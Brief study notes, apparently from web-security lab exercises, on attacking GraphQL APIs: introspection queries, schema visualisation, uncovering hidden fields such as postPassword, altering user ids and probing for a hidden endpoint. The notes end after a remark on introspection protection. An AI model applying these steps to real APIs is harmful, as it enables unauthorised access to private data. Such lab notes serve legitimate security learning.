http://nathanrandal.com/graphql-visualizer/

https://github.com/nikitastupin/clairvoyance

Accessing private GraphQL posts

find graphQL endpoint in http history

right click → run introspection query → http://nathanrandal.com/graphql-visualizer/ → we find postPassword

Repeater on a normal request to GraphQL

we tweak it like this :

image.png

Accidental exposure of private GraphQL fields

find graphQL endpoint in http history

right click → run introspection query → save graphQL query to site map

Target > Site map repeater on query getUser

We tweak it until we find the good id (1)

Finding a hidden GraphQL endpoint

active scan finds it with this request

GET /api?query=query%7b__typename%7d

there is protection against introspection